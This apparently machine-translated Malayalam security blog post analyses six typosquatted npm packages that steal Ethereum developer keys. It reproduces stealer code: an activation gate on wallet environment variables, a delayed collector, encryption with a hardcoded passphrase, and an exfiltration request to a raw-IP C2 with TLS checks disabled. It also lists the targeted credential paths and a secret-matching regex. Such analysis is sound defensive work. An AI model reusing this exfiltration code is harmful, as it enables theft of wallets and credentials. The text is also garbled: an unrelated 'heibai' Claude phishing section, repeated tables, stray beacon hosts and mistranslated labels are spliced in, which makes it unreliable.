EVMDeFi npm ടൈപ്പോസ്ക്വാട്ടിംഗ് ആക്രമണം ഡെവലപ്പർ കീകൾ മോഷ്ടിക്കുന്നു

EVM/DeFi npm ടൈപ്പോസ്ക്വാട്ടിംഗ് ആക്രമണം ഡെവലപ്പർ കീകൾ മോഷ്ടിക്കുന്നു

ഉള്ളടക്ക പട്ടിക

നിർബന്ധമായും വായിക്കേണ്ട പോസ്റ്റുകൾ

താൽപ്പര്യമുള്ള ഏറ്റവും പുതിയ പോസ്റ്റുകൾ

അച്ചു ഡി.ആർ.

2026 മെയ് 6-ന്, ഒരൊറ്റ npm പ്രസാധകൻ, namikazesarada010206, Ethereum, Solidity, DeFi ഡെവലപ്പർ ഇക്കോസിസ്റ്റം എന്നിവയെ ലക്ഷ്യം വച്ചുള്ള ആറ് ക്ഷുദ്ര പാക്കേജുകൾ മുന്നോട്ട് വച്ചു.

പാക്കേജുകൾ, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, ഒപ്പം web3-utils-core, ജനപ്രിയ Web3 ടൂളിംഗിനായി സഹായ ലൈബ്രറികൾ പോലെ തോന്നിക്കാൻ രൂപകൽപ്പന ചെയ്ത വിശ്വസനീയമായ പേരുകൾ ഉപയോഗിച്ചു.

ആറ് പാക്കേജുകളിലും ഒരേ കാര്യം തന്നെയായിരുന്നു ഉണ്ടായിരുന്നത് telemetry.js ഫയൽ. ക്ലസ്റ്ററിലുടനീളം ഫയൽ ബൈറ്റ്-സമാനമായിരുന്നു, SHA-256:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

ഇൻസ്റ്റാൾ ചെയ്യുന്ന സമയത്ത് മാൽവെയർ പ്രവർത്തിക്കുന്നില്ല. ഇല്ല preinstall or postinstall ഹുക്ക്. പകരം, പാക്കേജ് ഇറക്കുമതി ചെയ്യുമ്പോൾ അത് സജീവമാകുന്നു. require().

ആ വിശദാംശം പ്രധാനമാണ്.

ഒരു ഡെവലപ്പർ പാക്കേജ് യഥാർത്ഥത്തിൽ ഉപയോഗിക്കുന്നതുവരെ ഇംപ്ലാന്റ് കാത്തിരിക്കുന്നു. തുടർന്ന് വർക്ക്സ്റ്റേഷൻ ഒരു യഥാർത്ഥ Ethereum / Solidity വികസന പരിസ്ഥിതി പോലെയാണോ കാണപ്പെടുന്നതെന്ന് അത് പരിശോധിക്കുന്നു. ഇത് ആൽക്കെമി അല്ലെങ്കിൽ ഇൻഫുറ കീകൾ, സ്വകാര്യ കീകൾ, മെമ്മോണിക്സ്, ഡിപ്ലോയർ കീകൾ അല്ലെങ്കിൽ ഒരു പ്രാദേശിക ഫൗണ്ടറി ഡയറക്ടറി എന്നിവയ്ക്കായി തിരയുന്നു.

ഹോസ്റ്റ് പൊരുത്തപ്പെടുന്നുവെങ്കിൽ, സ്റ്റീലർ SSH സ്വകാര്യ കീകൾ, ഫൗണ്ടറി / ഗെത്ത് / ബ്രൗണി വാലറ്റ് കീസ്റ്റോറുകൾ എന്നിവ ശേഖരിക്കുന്നു, .env* ഫയലുകളും സെൻസിറ്റീവ് എൻവയോൺമെന്റ് വേരിയബിളുകളും. ഇത് ഒരു ഹാർഡ്‌കോഡ് ചെയ്ത പാസ്‌ഫ്രെയ്‌സ് ഉപയോഗിച്ച് AES-256-GCM ഉപയോഗിച്ച് ബണ്ടിൽ എൻക്രിപ്റ്റ് ചെയ്യുകയും TLS പരിശോധന പ്രവർത്തനരഹിതമാക്കിയ ഒരു റോ IPv4 C2 എൻഡ്‌പോയിന്റിലേക്ക് എക്‌സ്‌ഫിൽട്രേറ്റ് ചെയ്യുകയും ചെയ്യുന്നു.

സൈജെനിയുടെ മാൽവെയർ ഏർലി വാണിംഗ് (MEW) സിസ്റ്റം ആറ് പാക്കേജുകളും ക്ഷുദ്രകരമാണെന്ന് സ്ഥിരീകരിച്ചു. npm രജിസ്ട്രി നീക്കം ചെയ്യൽ റിപ്പോർട്ട് ബണ്ടിൽ തീർപ്പുകൽപ്പിച്ചിട്ടില്ല.

ക്ലസ്റ്റർ: ആറ് പാക്കേജുകൾ, ഒരു പ്രസാധകൻ

പ്രസാധക അക്കൗണ്ട് namikazesarada010206 സ്ഥിരീകരിക്കാത്ത Gmail വിലാസവുമായി ലിങ്ക് ചെയ്‌തു namikazesarada010206@gmail.com.

2026 മെയ് 6-ന് ഒരു ദിവസത്തെ പ്രസിദ്ധീകരണ ബർസ്റ്റായി കാമ്പെയ്‌ൻ പ്രത്യക്ഷപ്പെട്ടു. ആറ് പാക്കേജുകളും ഇങ്ങനെ പതിപ്പിക്കപ്പെട്ടു 1.0.0, റൺടൈം ഡിപൻഡൻസികൾ പൂജ്യം ആയിരുന്നു, മൂന്ന് ഫയലുകൾ മാത്രമേ ഷിപ്പ് ചെയ്തിട്ടുള്ളൂ:

package.json index.js telemetry.js

അവർ അതേ ഉറവിട ശേഖരണവും പ്രഖ്യാപിച്ചു:

https://github.com/harunosakura030303-maker/evmchain-config

ആദ്യ പ്രസിദ്ധീകരണത്തിൽ തന്നെ ആദ്യത്തെ മൂന്ന് പാക്കേജുകൾ MEW സ്കാനറുകൾ പിടിച്ചെടുത്തു. പ്രസാധകന്റെ npm പ്രൊഫൈലിന്റെ വിശകലന അവലോകനത്തിന് ശേഷം ബാക്കിയുള്ള മൂന്നെണ്ണം നിർബന്ധിതമായി ഫ്ലാഗ് ചെയ്തു. ഒരിക്കൽ ഒരേ ബൈറ്റ്-സമാനമായിരുന്നു telemetry.js ക്ലസ്റ്ററിലുടനീളം സ്ഥിരീകരിച്ചെങ്കിലും, സ്ഥിരതയാൽ അവ ക്ഷുദ്രകരമായി അടച്ചു.

പാക്കേജ് പതിപ്പ് npm പ്രസിദ്ധീകരിച്ചു MEW ടിക്കറ്റ് കോടതിവിധി
വീം-കോർ 1.0.0 2026-05-06 01:38:44Z #51049 ക്ഷുഭിതൻ
viem-utils-core - ക്ലൗഡിൽ ഓൺലൈനിൽ 1.0.0 2026-05-06 #51050 ക്ഷുഭിതൻ
ഹാർഡ്‌ഹാറ്റ്-കോർ-യൂട്ടിലുകൾ 1.0.0 2026-05-06 #51051 ക്ഷുഭിതൻ
evm-utils (എവിഎം-യൂട്ടിലുകൾ) 1.0.0 2026-05-06 #51069 സ്ഥിരതയാൽ, ദോഷകരം
ഫൗണ്ടറി-യൂട്ടിലിസ് 1.0.0 2026-05-06 #51071 സ്ഥിരതയാൽ, ദോഷകരം
വെബ്3-യൂട്ടിലിസ്-കോർ 1.0.0 2026-05-06 #51070 സ്ഥിരതയാൽ, ദോഷകരം

പേരിടൽ തന്ത്രം ലളിതമാണ്, പക്ഷേ ഫലപ്രദമാണ്.

ഈ പാക്കേജുകൾ കൃത്യമായ അപ്‌സ്ട്രീം പേരുകൾ അനുകരിക്കുന്നില്ല. പകരം, അവ വിശ്വസനീയമായ "യൂട്ടിലിറ്റി" പ്രത്യയങ്ങൾ ഉപയോഗിക്കുന്നു, ഉദാഹരണത്തിന് -core, -utils, ഒപ്പം -utils-core. വെബ്3 ടൂളിംഗിന് സമീപം ഒരു ഡെവലപ്പർ പ്രതീക്ഷിക്കുന്ന കമ്പാനിയൻ ലൈബ്രറികൾ പോലെയാണ് അവയെ തോന്നിപ്പിക്കുന്നത്.

ക്ഷുദ്ര പാക്കേജ് നിയമാനുസൃത ലക്ഷ്യം
വീം-കോർ viem, ഒരു ജനപ്രിയ Ethereum ടൈപ്പ്സ്ക്രിപ്റ്റ് ക്ലയന്റ്
viem-utils-core - ക്ലൗഡിൽ ഓൺലൈനിൽ വീം
ഹാർഡ്‌ഹാറ്റ്-കോർ-യൂട്ടിലുകൾ ഹാർഡ്‌ഹാറ്റ്, ഒരു മുഖ്യധാരാ സോളിഡിറ്റി വികസന പരിസ്ഥിതി
evm-utils (എവിഎം-യൂട്ടിലുകൾ) ജനറിക് ഇവിഎം ടൂളിംഗ് നെയിംസ്‌പെയ്‌സ്
ഫൗണ്ടറി-യൂട്ടിലിസ് ഫൗണ്ടറി, ഒരു സോളിഡിറ്റി ടൂൾചെയിൻ
വെബ്3-യൂട്ടിലിസ്-കോർ web3-utils, Web3.js സഹായികൾ

ഇതാണ് "സപ്ലിമെന്റൽ പാക്കേജ്" പാറ്റേൺ: "ഞാൻ യഥാർത്ഥ പാക്കേജാണ്" എന്നല്ല, മറിച്ച് "യഥാർത്ഥ പാക്കേജിന് ചുറ്റും ന്യായമായ ഒരു സഹായിയെപ്പോലെയാണ് ഞാൻ കാണപ്പെടുന്നത്."

വേഗത്തിൽ നീങ്ങുന്ന DeFi ഡെവലപ്പർമാർക്ക്, അപകടസാധ്യത സൃഷ്ടിക്കാൻ അത് മതിയാകും.

പാക്കേജ് ഇറക്കുമതി ചെയ്യുമ്പോൾ എന്താണ് സംഭവിക്കുന്നത്

ആക്രമണ ശൃംഖല ചെറുതും, ആസൂത്രിതവും, ക്രിപ്‌റ്റോ-വികസന പരിതസ്ഥിതികളിൽ ശ്രദ്ധ കേന്ദ്രീകരിക്കുന്നതുമാണ്.

ഇൻസ്റ്റലേഷൻ ഹുക്ക് ഇല്ല. പകരം, ഓരോ പാക്കേജിലും ഒരു ഉൾപ്പെടുന്നു index.js അത് സ്റ്റബ് ഫംഗ്ഷണാലിറ്റി കയറ്റുമതി ചെയ്യുകയും മാലിഷ്യസ് ടെലിമെട്രി മൊഡ്യൂൾ ലോഡ് ചെയ്യുകയും ചെയ്യുന്നു.

require('./telemetry').init();

ഇതിനർത്ഥം ആദ്യ ഇറക്കുമതിയിൽ തന്നെ മാൽവെയർ സജീവമാകുന്നു എന്നാണ്.

ആക്രമണകാരിക്ക് പ്രവർത്തനപരമായി അത് ഉപയോഗപ്രദമാണ്. പല സ്കാനറുകളും സാൻഡ്‌ബോക്‌സുകളും ഇൻസ്റ്റാൾ-ടൈം സ്വഭാവത്തിൽ ശ്രദ്ധ കേന്ദ്രീകരിക്കുന്നു. ഒരു ഡെവലപ്പർ, ബിൽഡ് സ്ക്രിപ്റ്റ്, ടെസ്റ്റ് സ്യൂട്ട് അല്ലെങ്കിൽ റൺടൈം പാത്ത് എന്നിവ യഥാർത്ഥത്തിൽ ഉപയോഗിക്കുന്നതുവരെ ഈ പാക്കേജ് കാത്തിരിക്കുന്നു.

ആക്ടിവേഷൻ ഗേറ്റ്: റിയൽ വെബ്3 ഡെവലപ്പർ വർക്ക്‌സ്റ്റേഷനുകളിൽ മാത്രം ഫയർ

ഇംപ്ലാന്റിന്റെ ഏറ്റവും പ്രധാനപ്പെട്ട ഭാഗം ആക്ടിവേഷൻ ഗേറ്റ് ആണ്.

Ethereum / Solidity ഡെവലപ്പർ മെഷീനുകളിൽ സാധാരണയായി കാണപ്പെടുന്ന പരിസ്ഥിതി വേരിയബിളുകൾക്കായുള്ള മാൽവെയർ പരിശോധനകൾ:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

ഫൗണ്ടറി ഇൻസ്റ്റാൾ ചെയ്തിട്ടുണ്ടോ എന്നും ഇത് പരിശോധിക്കുന്നു:

fs.existsSync(path.join(os.homedir(), '.foundry'))

രണ്ട് വ്യവസ്ഥകളും ശരിയല്ലെങ്കിൽ, ഫംഗ്ഷൻ തിരികെ വരും, ഒന്നും ചെയ്യുന്നില്ല.

ഇത് പൊതുവായ വിശകലന പരിതസ്ഥിതികളിൽ പാക്കേജിനെ കൂടുതൽ നിശബ്ദമാക്കുന്നു. ഫൗണ്ടറി, ആൽക്കെമി കീകൾ, ഇൻഫുറ കീകൾ, പ്രൈവറ്റ് കീകൾ, അല്ലെങ്കിൽ മെമ്മോണിക്സ് എന്നിവയില്ലാത്ത ഒരു സാൻഡ്‌ബോക്‌സിൽ നിരുപദ്രവകരമായ ഒരു ഇറക്കുമതി കാണാൻ കഴിയും.

പൊരുത്തപ്പെടുന്ന ഒരു ഹോസ്റ്റിൽ, മാൽവെയർ ശേഖരിക്കുന്നതിന് 60 മുതൽ 90 സെക്കൻഡ് വരെ കാത്തിരിക്കും:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

ഈ കാലതാമസം ഇറക്കുമതിയും പുറംതള്ളലും തമ്മിലുള്ള വ്യക്തമായ ബന്ധം കുറയ്ക്കുന്നു. .unref() ഒരു ഹ്രസ്വകാല സ്ക്രിപ്റ്റിലാണ് പാക്കേജ് ഇറക്കുമതി ചെയ്തതെങ്കിൽ, കോൾ ഹോസ്റ്റ് പ്രോസസ്സിനെ സാധാരണയായി പുറത്തുകടക്കാൻ അനുവദിക്കുന്നു.

ഇത് ശബ്ദായമാനമായ അടിച്ചുപൊളിക്കൽ സ്വഭാവമല്ല. ഡെവലപ്പർ പരിതസ്ഥിതി മോഷ്ടിക്കാൻ കൊള്ളാത്ത പക്ഷം പ്രവർത്തിക്കുന്നത് ഒഴിവാക്കാൻ രൂപകൽപ്പന ചെയ്‌ത ഒരു ലക്ഷ്യം വച്ചുള്ള മോഷണമാണിത്.

മോഷ്ടാവ് ശേഖരിക്കുന്നത്

ആക്ടിവേഷൻ ഗേറ്റ് കടന്നുകഴിഞ്ഞാൽ, Web3 വികസനത്തിൽ ഏറ്റവും പ്രധാനപ്പെട്ട ഉറവിടങ്ങളിൽ നിന്ന് മാൽവെയർ ശേഖരിക്കുന്നു: സ്വകാര്യ കീകൾ, വാലറ്റ് കീസ്റ്റോറുകൾ, വിന്യാസ ക്രെഡൻഷ്യലുകൾ, ക്ലൗഡ് രഹസ്യങ്ങൾ, npm ടോക്കണുകൾ, പ്രാദേശിക പ്രോജക്റ്റ് കോൺഫിഗറേഷൻ.

ഉറവിടം എന്താണ് ശേഖരിക്കുന്നത്
പ്രോസസ്.എൻവി ഏതെങ്കിലും വേരിയബിൾ പൊരുത്തപ്പെടുത്തൽ /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MEMEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* പൂർണ്ണ ഫയൽ ഉള്ളടക്കം ഉൾപ്പെടെ, PRIVATE KEY അല്ലെങ്കിൽ BEGIN OPENSSH അടങ്ങിയിരിക്കുന്ന ഫയലുകൾ
~/.ഫൗണ്ടറി/കീസ്റ്റോറുകൾ/* ഫൗണ്ടറി വാലറ്റ് കീസ്റ്റോർ ഫയലുകൾ
~/.എതെറിയം/കീസ്റ്റോർ/* ഗെത്ത് വാലറ്റ് കീസ്റ്റോർ ഫയലുകൾ
~/.ബ്രൗണി/അക്കൗണ്ടുകൾ/* ബ്രൗണി വാലറ്റ് കീസ്റ്റോർ ഫയലുകൾ
${cwd}/.env പൂർണ്ണ ഫയൽ ഉള്ളടക്കം
${cwd}/.env.ലോക്കൽ പൂർണ്ണ ഫയൽ ഉള്ളടക്കം
${cwd}/.env.പ്രൊഡക്ഷൻ പൂർണ്ണ ഫയൽ ഉള്ളടക്കം
${cwd}/.env.development പൂർണ്ണ ഫയൽ ഉള്ളടക്കം
os.ഹോസ്റ്റ്നെയിം() ഹോസ്റ്റ് മെറ്റാഡാറ്റ
ക്രിപ്റ്റോ.റാൻഡംയുയുഐഡി() ഇര/സെഷൻ ഐഡന്റിഫയർ
തീയതി.ഇപ്പോൾ() ശേഖരണ ടൈംസ്റ്റാമ്പ്
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

ATTA ടോക്കണുകൾ ഇവയാണ്:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

ടെലിമെട്രി ഓപ്പറേറ്ററുടെ സ്വന്തം അനലിറ്റിക്സാണോ അതോ പ്രത്യേകം ധനസമ്പാദനം നടത്തിയ ചാനലാണോ എന്ന് സ്ഥിരീകരിക്കാൻ ഞങ്ങൾക്ക് കഴിഞ്ഞിട്ടില്ല. ഞങ്ങൾ പരിശോധിച്ച രണ്ട് സാമ്പിളുകളിലും ATTA ടോക്കണുകൾ ഒന്നുതന്നെയാണ്.

ക്ലസ്റ്റർ ബി: ഹെയ്ബായ്

claude.hk OAuth ഫിഷിംഗ് + ANTHROPIC_BASE_URL ഹൈജാക്ക്

ഏപ്രിൽ 1 ലെ സാമ്പിൾ പ്രചാരണത്തിന്റെ ഏറ്റവും പരുക്കൻ, മുൻകാല ശാഖയാണ്.

heibai:2.1.88-claude.hk-4 പ്രസിദ്ധീകരിച്ചത് wuguoqiangvip28, 2025 ജൂൺ 7-ന് സൃഷ്ടിച്ച ഒരു അക്കൗണ്ട്. പാക്കേജ് നിയമാനുസൃതമായതിന് വിരുദ്ധമായി വ്യക്തമായി പതിപ്പ് ചെയ്‌തു. 2.1.88 ആന്ത്രോപിക് റിലീസ്.

ഇത് CA-cert MITM നെ ബാധിക്കുന്നില്ല. പകരം, OAuth എൻഡ്‌പോയിന്റിനെക്കുറിച്ച് ഉപയോക്താവിനോട് കള്ളം പറയുന്നു.

ചോർന്ന ക്ലോഡ് കോഡ് ഉറവിടത്തിന് മുകളിലുള്ള ക്ഷുദ്രകരമായ കൂട്ടിച്ചേർക്കലുകളിൽ ഇവ ഉൾപ്പെടുന്നു:

ഉറവിടം എന്താണ് ശേഖരിക്കുന്നത്
പ്രോസസ്.എൻവി ഏതെങ്കിലും വേരിയബിൾ പൊരുത്തപ്പെടുത്തൽ /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MEMEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* പൂർണ്ണ ഫയൽ ഉള്ളടക്കം ഉൾപ്പെടെ, PRIVATE KEY അല്ലെങ്കിൽ BEGIN OPENSSH അടങ്ങിയിരിക്കുന്ന ഫയലുകൾ
~/.ഫൗണ്ടറി/കീസ്റ്റോറുകൾ/* ഫൗണ്ടറി വാലറ്റ് കീസ്റ്റോർ ഫയലുകൾ
~/.എതെറിയം/കീസ്റ്റോർ/* ഗെത്ത് വാലറ്റ് കീസ്റ്റോർ ഫയലുകൾ
~/.ബ്രൗണി/അക്കൗണ്ടുകൾ/* ബ്രൗണി വാലറ്റ് കീസ്റ്റോർ ഫയലുകൾ
${cwd}/.env പൂർണ്ണ ഫയൽ ഉള്ളടക്കം
${cwd}/.env.ലോക്കൽ പൂർണ്ണ ഫയൽ ഉള്ളടക്കം
${cwd}/.env.പ്രൊഡക്ഷൻ പൂർണ്ണ ഫയൽ ഉള്ളടക്കം
${cwd}/.env.development പൂർണ്ണ ഫയൽ ഉള്ളടക്കം
os.ഹോസ്റ്റ്നെയിം() ഹോസ്റ്റ് മെറ്റാഡാറ്റ
ക്രിപ്റ്റോ.റാൻഡംയുയുഐഡി() ഇര/സെഷൻ ഐഡന്റിഫയർ
തീയതി.ഇപ്പോൾ() ശേഖരണ ടൈംസ്റ്റാമ്പ്

ലക്ഷ്യ പട്ടിക വളരെ നിർദ്ദിഷ്ടമാണ്. ഇത് പൊതുവായ ബ്രൗസർ മോഷണമോ വിശാലമായ ക്രെഡൻഷ്യൽ സ്ക്രാപ്പിംഗോ അല്ല. Ethereum ആപ്ലിക്കേഷനുകൾ നിർമ്മിക്കുകയോ പരീക്ഷിക്കുകയോ വിന്യസിക്കുകയോ പ്രവർത്തിപ്പിക്കുകയോ ചെയ്യുന്ന ഡെവലപ്പർമാരെ ലക്ഷ്യമിട്ടുള്ളതാണ് ഇത്.

ഫൗണ്ടറി, ഗെത്ത്, ബ്രൗണി കീസ്റ്റോറുകൾ എന്നിവ ഉൾപ്പെടുത്തേണ്ടത് വളരെ പ്രധാനമാണ്. ഈ ഫയലുകൾക്ക് വാലറ്റുകളിലേക്കോ വിന്യാസ ഐഡന്റിറ്റികളിലേക്കോ നേരിട്ടുള്ള ആക്‌സസ് പ്രതിനിധീകരിക്കാൻ കഴിയും. ആക്രമണകാരിക്ക് അവയെ പാസ്‌വേഡുകൾ, ഓർമ്മക്കുറിപ്പുകൾ അല്ലെങ്കിൽ പരിസ്ഥിതി രഹസ്യങ്ങൾ എന്നിവയുമായി ജോടിയാക്കാൻ കഴിയുമെങ്കിൽ, അവർക്ക് ഫണ്ടുകൾ നീക്കാനോ, വിന്യാസകരെ അനുകരിക്കാനോ, സ്മാർട്ട് കോൺട്രാക്റ്റ് പ്രവർത്തനങ്ങളിൽ വിട്ടുവീഴ്ച ചെയ്യാനോ കഴിഞ്ഞേക്കും.

പുറംതള്ളലിന് മുമ്പുള്ള എൻക്രിപ്ഷൻ

ശേഖരിച്ച ഡാറ്റ മാൽവെയർ അയയ്ക്കുന്നതിന് മുമ്പ് എൻക്രിപ്റ്റ് ചെയ്യുന്നു.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

ഹാർഡ്‌കോഡ് ചെയ്‌ത പാസ്‌ഫ്രെയ്‌സ് ഇതാണ്:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

അന്തിമ പേലോഡ് JSON ആയി പൊതിഞ്ഞിരിക്കുന്നു:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

എൻക്രിപ്ഷൻ മാൽവെയറിനെ സ്വയം കൂടുതൽ വിപുലമാക്കുന്നില്ല. എന്നിരുന്നാലും, ഇത് നെറ്റ്‌വർക്ക് പരിശോധനയെ കൂടുതൽ ബുദ്ധിമുട്ടാക്കുന്നു. പുറത്തേക്കുള്ള വഴി നിരീക്ഷിക്കുന്ന ഒരു ഡിഫൻഡർക്ക് ഒരു JSON പേലോഡ് കാണാൻ കഴിയും, പക്ഷേ മോഷ്ടിച്ച കീകൾ, വാലറ്റ് ഫയലുകൾ അല്ലെങ്കിൽ .env ഹാർഡ്‌കോഡ് ചെയ്ത പാസ്‌ഫ്രെയ്‌സും ഡീക്രിപ്ഷൻ ലോജിക്കും ഇല്ലാത്ത ഉള്ളടക്കങ്ങൾ.

ഒരു റോ IPv4 C2 ലേക്കുള്ള എക്സ്ഫിൽട്രേഷൻ

എക്‌സ്‌ഫിൽട്രേഷൻ പാത്ത് ഹാർഡ്‌കോഡ് ചെയ്‌തിരിക്കുന്നു:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

മാൽവെയർ ഡാറ്റ ഇതിലേക്ക് അയയ്ക്കുന്നു:

https://76.13.37.80:8443/api/v1/telemetry

രണ്ട് വിശദാംശങ്ങൾ വേറിട്ടുനിൽക്കുന്നു.

ഒന്നാമതായി, C2 ഒരു ഡൊമെയ്‌നല്ല, മറിച്ച് ഒരു റോ IPv4 വിലാസമാണ്. ഇത് ഡൊമെയ്‌ൻ രജിസ്ട്രേഷന്റെ ആവശ്യകത ഇല്ലാതാക്കുകയും ചില ഡൊമെയ്‌ൻ അധിഷ്ഠിത കണ്ടെത്തലുകൾ ഒഴിവാക്കുകയും ചെയ്യുന്നു.

രണ്ടാമതായി, TLS പരിശോധന ഇനിപ്പറയുന്നവ ഉപയോഗിച്ച് അപ്രാപ്തമാക്കിയിരിക്കുന്നു:

rejectUnauthorized: false

സ്വയം ഒപ്പിട്ട സർട്ടിഫിക്കറ്റുകൾ ഉൾപ്പെടെ ഏത് സർട്ടിഫിക്കറ്റും സ്വീകരിക്കാൻ മാൽവെയറിനെ ഇത് അനുവദിക്കുന്നു. മറ്റൊരു വിധത്തിൽ പറഞ്ഞാൽ, സാധുവായ ഒരു പൊതു സർട്ടിഫിക്കറ്റ് ആവശ്യമില്ലാതെ തന്നെ ആക്രമണകാരിക്ക് എൻക്രിപ്റ്റ് ചെയ്ത ട്രാൻസ്പോർട്ട് ലഭിക്കുന്നു.

പുനഃശ്രമ ലോജിക്കോ ഫോൾബാക്ക് ഹോസ്റ്റോ ഇല്ല. പിശകുകൾ നിശബ്ദമായി വിഴുങ്ങുന്നു. C2 ഓഫ്‌ലൈനിലോ എത്തിച്ചേരാനാകുന്നില്ലെങ്കിലോ ഇത് പാക്കേജിനെ നിശബ്ദമായി നിലനിർത്തുന്നു.

ഈ കാമ്പെയ്‌ൻ എന്തുകൊണ്ട് പ്രധാനമാണ്

ഡെവലപ്പർമാരെ ലക്ഷ്യം വച്ചുള്ള മിക്ക ക്ഷുദ്രകരമായ npm പാക്കേജുകളും വിശാലമായ ക്രെഡൻഷ്യലുകൾ പിന്തുടരുന്നു: npm ടോക്കണുകൾ, AWS കീകൾ, GitHub ടോക്കണുകൾ, അല്ലെങ്കിൽ .npmrc ഫയലുകൾ.

ഈ പ്രചാരണം ലക്ഷ്യത്തെ ചുരുക്കുന്നു.

മെഷീൻ ഒരു Ethereum അല്ലെങ്കിൽ Solidity ഡെവലപ്പറുടെതാണെന്നതിന്റെ സൂചനകൾ ഇത് തിരയുന്നു. തുടർന്ന് ആ പരിതസ്ഥിതിയിൽ പ്രാധാന്യമുള്ള ആസ്തികൾ കൃത്യമായി അത് വലിച്ചെടുക്കുന്നു: വാലറ്റ് കീസ്റ്റോറുകൾ, സ്വകാര്യ കീകൾ, മെമ്മോണിക്സ്, ഡിപ്ലോയർ കീകൾ, .env ഫയലുകൾ, SSH കീകൾ എന്നിവ.

അത് Web3 ടീമുകൾക്ക് ഒരു സാധാരണ npm സ്റ്റീലറിനേക്കാൾ അപകടകരമാക്കുന്നു.

വിജയകരമായ ഒരു അണുബാധ ഇനിപ്പറയുന്നവ വെളിപ്പെടുത്തിയേക്കാം:

  • വിന്യാസ വാലറ്റുകൾ
  • സ്മാർട്ട് കോൺട്രാക്റ്റ് അഡ്മിൻ കീകൾ
  • ആർ‌പി‌സി ദാതാവിന്റെ കീകൾ
  • ക്ലൗഡ് വിന്യാസ ക്രെഡൻഷ്യലുകൾ
  • npm പബ്ലിഷിംഗ് ടോക്കണുകൾ
  • ഡെവലപ്പർ അല്ലെങ്കിൽ ബിൽഡ് ഇൻഫ്രാസ്ട്രക്ചറിലേക്കുള്ള SSH ആക്‌സസ്
  • സൂക്ഷിച്ചിരിക്കുന്ന പ്രോജക്റ്റ് രഹസ്യങ്ങൾ .env ഫയലുകൾ
  • ഫൗണ്ടറി, ഗെത്ത്, അല്ലെങ്കിൽ ബ്രൗണി എന്നിവയ്ക്കുള്ള വാലറ്റ് കീസ്റ്റോറുകൾ

പാക്കേജ് പേരുകൾ വ്യക്തമായ സോഷ്യൽ എഞ്ചിനീയറിംഗും കാണിക്കുന്നു. പരിചിതമായ ഉപകരണ നാമങ്ങളിലൂടെ അവ Web3 ഡെവലപ്പർ ഇക്കോസിസ്റ്റത്തെ ലക്ഷ്യമിടുന്നു: viem, hardhat, foundry, evm, ഒപ്പം web3.

യഥാർത്ഥ പ്രോജക്ടുകളിൽ വിട്ടുവീഴ്ച ചെയ്യേണ്ട ആവശ്യമില്ല. ന്യായമായ ഒരു കമ്പാനിയൻ പാക്കേജ് പോലെ തോന്നിക്കുന്ന ഒന്ന് ഇൻസ്റ്റാൾ ചെയ്യാൻ അവർക്ക് ഒരു ഡെവലപ്പർ മാത്രമേ ആവശ്യമുള്ളൂ.

വിട്ടുവീഴ്ചയുടെയും കണ്ടെത്തലിന്റെയും സൂചകങ്ങൾ

പാക്കേജുകളും പ്രസാധകരും
ഫീൽഡ് വില
എൻ‌പി‌എം പ്രസാധകൻ നമികാസെസരദ010206
പ്രസാധക ഇമെയിൽ namikazesarada010206@gmail.com
ഇമെയിൽ പരിശോധിച്ചു ഇല്ല
SCM പരിശോധിച്ചു ഇല്ല
മതിപ്പ് സ്കോർ 1.0
പാക്കേജുകൾ viem-core, viem-utils-core, hardhat-core-utils, evm-utils, Foundry-utils, web3-utils-core
പതിപ്പുകൾ എല്ലാം 1.0.0
ഉറവിട ശേഖരം https://github.com/harunosakura030303-maker/evmchain-config
സ്ഥിരീകരിച്ച ദോഷകരമായത് ആറ് പാക്കേജുകളും
നെറ്റ്വർക്ക്
ടൈപ്പ് ചെയ്യുക വില
C2 എൻഡ്‌പോയിന്റ് https://76.13.37.80:8443/api/v1/telemetry
സി2 ഐപി 76.13.37.80
C2 പോർട്ട് 8443/ടിസിപി
TLS സ്വഭാവം അംഗീകാരമില്ലാത്തത് നിരസിക്കുക: തെറ്റ്
പേലോഡ് സ്കീമ {"v":2,"iv": ,"ഡി": ,"ടി": }
ഫയലുകളും ഹാഷുകളും
ടൈപ്പ് ചെയ്യുക വില
telemetry.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
പാക്കേജ് ലേഔട്ട് പാക്കേജ്.ജെസൺ, ഇൻഡെക്സ്.ജെഎസ്, ടെലിമെട്രി.ജെഎസ്
ഫയലുകളുടെ എണ്ണം 3
ഏകദേശ ആകെ വലുപ്പം 3.4 കെ.ബി.

സജീവമാക്കൽ സിഗ്നലുകൾ

ഈ പരിസ്ഥിതി വേരിയബിളുകൾക്കായി മാൽവെയർ പരിശോധിക്കുന്നു:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

ഇത് ഇവയും പരിശോധിക്കുന്നു:

~/.foundry/

ടാർഗെറ്റുചെയ്‌ത ഹോസ്റ്റ് പാത്തുകൾ

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

ശേഖരം റെജക്സ്

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

കണ്ടെത്തൽ കുറിപ്പുകൾ

